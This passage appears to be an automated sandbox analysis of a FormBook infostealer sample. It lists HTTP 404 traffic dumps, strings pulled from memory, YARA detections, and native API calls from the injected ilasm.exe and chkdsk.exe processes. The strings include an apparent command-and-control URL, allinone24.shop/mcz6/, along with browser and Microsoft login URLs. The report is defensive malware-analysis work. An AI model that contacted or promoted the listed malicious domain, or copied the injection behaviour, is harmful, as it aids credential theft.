Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:08:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:09:12 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:09:14 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:09:17 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jun 2024 13:09:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: uwZgUlCQSPVT.exe, 00000010.00000002.4145287645.0000000002B9D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.allinone24.shop
Source: uwZgUlCQSPVT.exe, 00000010.00000002.4145287645.0000000002B9D000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.allinone24.shop/mcz6/
Source: chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chkdsk.exe, 0000000C.00000002.4146268881.0000000006694000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.0000000003F94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://contacts.zoho.com/static/file?t=org&ID=456089&fs=thumb
Source: chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: chkdsk.exe, 0000000C.00000002.4144465962.0000000004AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: chkdsk.exe, 0000000C.00000002.4144465962.0000000004AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: chkdsk.exe, 0000000C.00000002.4144465962.0000000004AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: chkdsk.exe, 0000000C.00000002.4144465962.0000000004AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033u
Source: chkdsk.exe, 0000000C.00000002.4144465962.0000000004AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: chkdsk.exe, 0000000C.00000002.4144465962.0000000004AA2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: chkdsk.exe, 0000000C.00000003.2098391829.00000000098CE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: chkdsk.exe, 0000000C.00000002.4146268881.0000000005D28000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.0000000003628000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.allinone24.shop/mcz6/?HV8hD=_ZnHYJfHNd6deTQP&abN=iV05GdjlKKe2Focp0rDI6BJmO0Ht/xDmYroAP0q
Source: chkdsk.exe, 0000000C.00000002.4148636355.00000000098E8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chkdsk.exe, 0000000C.00000002.4146268881.00000000069B8000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.00000000042B8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.fastmail.help/hc/en-us/articles/1500000280141
Source: chkdsk.exe, 0000000C.00000002.4146268881.00000000069B8000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.00000000042B8000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.fastmailusercontent.com/filestorage/css/main.css
Source: chkdsk.exe, 0000000C.00000002.4146268881.0000000006E6E000.00000004.10000000.00040000.00000000.sdmp, chkdsk.exe, 0000000C.00000002.4148485195.0000000007EA0000.00000004.00000800.00020000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.000000000476E000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.000000000394C000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.strato.de
Source: chkdsk.exe, 0000000C.00000002.4146268881.0000000006694000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.0000000003F94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zoho.com/sites/?src=parkeddomain&dr=www.jrksa.info
Source: chkdsk.exe, 0000000C.00000002.4146268881.0000000006694000.00000004.10000000.00040000.00000000.sdmp, uwZgUlCQSPVT.exe, 00000010.00000002.4145567789.0000000003F94000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://www.zoho.com/sites/images/professionally-crafted-themes.png

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.ilasm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ilasm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.ilasm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.ilasm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4144181490.0000000004560000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1869984902.0000000005ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1869313393.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4144364221.0000000004A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000010.00000002.4145287645.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.4144410750.0000000004A40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.4145259981.00000000025C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1870033073.0000000005F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_0042B113 NtClose,	5_2_0042B113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_05BF2DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_05BF2C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2B60 NtClose,LdrInitializeThunk,	5_2_05BF2B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF35C0 NtCreateMutant,LdrInitializeThunk,	5_2_05BF35C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF4650 NtSuspendThread,	5_2_05BF4650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF4340 NtSetContextThread,	5_2_05BF4340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2DB0 NtEnumerateKey,	5_2_05BF2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2DD0 NtDelayExecution,	5_2_05BF2DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2D30 NtUnmapViewOfSection,	5_2_05BF2D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2D10 NtMapViewOfSection,	5_2_05BF2D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2D00 NtSetInformationFile,	5_2_05BF2D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2CA0 NtQueryInformationToken,	5_2_05BF2CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2CF0 NtOpenProcess,	5_2_05BF2CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2CC0 NtQueryVirtualMemory,	5_2_05BF2CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2C00 NtQueryInformationProcess,	5_2_05BF2C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2C60 NtCreateKey,	5_2_05BF2C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2FB0 NtResumeThread,	5_2_05BF2FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2FA0 NtQuerySection,	5_2_05BF2FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2F90 NtProtectVirtualMemory,	5_2_05BF2F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2FE0 NtCreateFile,	5_2_05BF2FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2F30 NtCreateSection,	5_2_05BF2F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2F60 NtCreateProcessEx,	5_2_05BF2F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2EA0 NtAdjustPrivilegesToken,	5_2_05BF2EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2E80 NtReadVirtualMemory,	5_2_05BF2E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2EE0 NtQueueApcThread,	5_2_05BF2EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2E30 NtWriteVirtualMemory,	5_2_05BF2E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2BA0 NtEnumerateValueKey,	5_2_05BF2BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2B80 NtQueryInformationFile,	5_2_05BF2B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2BF0 NtAllocateVirtualMemory,	5_2_05BF2BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2BE0 NtQueryValueKey,	5_2_05BF2BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2AB0 NtWaitForSingleObject,	5_2_05BF2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2AF0 NtWriteFile,	5_2_05BF2AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF2AD0 NtReadFile,	5_2_05BF2AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF3090 NtSetValueKey,	5_2_05BF3090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF3010 NtOpenDirectoryObject,	5_2_05BF3010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF3D10 NtOpenProcessToken,	5_2_05BF3D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF3D70 NtOpenThread,	5_2_05BF3D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe	Code function: 5_2_05BF39B0 NtGetContextThread,	5_2_05BF39B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050635C0 NtCreateMutant,LdrInitializeThunk,	12_2_050635C0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05064650 NtSuspendThread,LdrInitializeThunk,	12_2_05064650
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05064340 NtSetContextThread,LdrInitializeThunk,	12_2_05064340
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062D10 NtMapViewOfSection,LdrInitializeThunk,	12_2_05062D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062D30 NtUnmapViewOfSection,LdrInitializeThunk,	12_2_05062D30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062DD0 NtDelayExecution,LdrInitializeThunk,	12_2_05062DD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062DF0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_05062DF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062C60 NtCreateKey,LdrInitializeThunk,	12_2_05062C60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062C70 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_05062C70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062CA0 NtQueryInformationToken,LdrInitializeThunk,	12_2_05062CA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062F30 NtCreateSection,LdrInitializeThunk,	12_2_05062F30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062FB0 NtResumeThread,LdrInitializeThunk,	12_2_05062FB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062FE0 NtCreateFile,LdrInitializeThunk,	12_2_05062FE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062E80 NtReadVirtualMemory,LdrInitializeThunk,	12_2_05062E80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062EE0 NtQueueApcThread,LdrInitializeThunk,	12_2_05062EE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_050639B0 NtGetContextThread,LdrInitializeThunk,	12_2_050639B0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062B60 NtClose,LdrInitializeThunk,	12_2_05062B60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062BA0 NtEnumerateValueKey,LdrInitializeThunk,	12_2_05062BA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062BE0 NtQueryValueKey,LdrInitializeThunk,	12_2_05062BE0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_05062BF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062AD0 NtReadFile,LdrInitializeThunk,	12_2_05062AD0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062AF0 NtWriteFile,LdrInitializeThunk,	12_2_05062AF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05063010 NtOpenDirectoryObject,	12_2_05063010
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05063090 NtSetValueKey,	12_2_05063090
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062D00 NtSetInformationFile,	12_2_05062D00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05063D10 NtOpenProcessToken,	12_2_05063D10
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05063D70 NtOpenThread,	12_2_05063D70
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062DB0 NtEnumerateKey,	12_2_05062DB0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062C00 NtQueryInformationProcess,	12_2_05062C00
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062CC0 NtQueryVirtualMemory,	12_2_05062CC0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062CF0 NtOpenProcess,	12_2_05062CF0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062F60 NtCreateProcessEx,	12_2_05062F60
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062F90 NtProtectVirtualMemory,	12_2_05062F90
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062FA0 NtQuerySection,	12_2_05062FA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062E30 NtWriteVirtualMemory,	12_2_05062E30
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062EA0 NtAdjustPrivilegesToken,	12_2_05062EA0
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062B80 NtQueryInformationFile,	12_2_05062B80
Source: C:\Windows\SysWOW64\chkdsk.exe	Code function: 12_2_05062AB0 NtWaitForSingleObject,	12_2_05062AB0
